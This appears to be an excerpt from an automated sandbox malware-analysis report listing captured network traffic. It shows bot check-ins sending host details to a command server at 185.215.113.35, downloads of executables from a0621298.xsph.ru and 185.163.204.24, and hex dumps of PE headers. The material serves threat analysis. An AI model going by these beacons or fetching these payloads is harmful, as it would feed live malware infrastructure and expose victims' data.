Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/aaef434f5519a28dfcee0c61d66234f26ec46162 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /RM.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b06fcd66668bd01f7f6369d95074ea8dHost: 185.215.113.35Content-Length: 96982Cache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:12 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:15 GMTContent-Type: application/x-msdos-programContent-Length: 294400Connection: closeLast-Modified: Thu, 13 Jan 2022 23:15:01 GMTETag: "47e00-5d57edb175f56"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 6c 2c 39 61 0d 42 6a 61 0d 42 6a 61 0d 42 6a 7f 5f d7 6a 7c 0d 42 6a 7f 5f c1 6a e2 0d 42 6a 7f 5f c6 6a 4f 0d 42 6a 46 cb 39 6a 62 0d 42 6a 61 0d 43 6a e8 0d 42 6a 7f 5f c8 6a 60 0d 42 6a 7f 5f d6 6a 60 0d 42 6a 7f 5f d3 6a 60 0d 42 6a 52 69 63 68 61 0d 42 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ac 0b a4 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 da 03 00 00 00 00 00 60 33 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 97 fa 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 80 01 00 28 00 00 00 00 20 04 00 88 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 73 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 1f 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 59 00 00 00 30 01 00 00 5a 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 82 02 00 00 90 01 00 00 22 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 dc 00 00 00 20 04 00 00 de 00 00 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: application/x-msdos-programContent-Length: 327680Connection: closeLast-Modified: Thu, 13 Jan 2022 23:15:02 GMTETag: "50000-5d57edb2597f5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 6c 2c 39 61 0d 42 6a 61 0d 42 6a 61 0d 42 6a 7f 5f d7 6a 7c 0d 42 6a 7f 5f c1 6a e2 0d 42 6a 7f 5f c6 6a 4f 0d 42 6a 46 cb 39 6a 62 0d 42 6a 61 0d 43 6a e8 0d 42 6a 7f 5f c8 6a 60 0d 42 6a 7f 5f d6 6a 60 0d 42 6a 7f 5f d3 6a 60 0d 42 6a 52 69 63 68 61 0d 42 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 2c 8f 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 5c 04 00 00 00 00 00 60 33 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 05 00 00 04 00 00 77 8a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 80 01 00 28 00 00 00 00 a0 04 00 88 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 73 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 1f 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 59 00 00 00 30 01 00 00 5a 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 04 03 00 00 90 01 00 00 a4 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 dc 00 00 00 a0 04 00 00 de 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:51 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:57 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:15:59 GMTContent-Type: application/octet-streamContent-Length: 356864Last-Modified: Thu, 13 Jan 2022 20:50:05 GMTConnection: keep-aliveETag: "61e0907d-57200"Expires: Thu, 20 Jan 2022 23:15:59 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5c 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 f4 15 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 15 04 00 00 90 01 00 00 16 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:06 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf 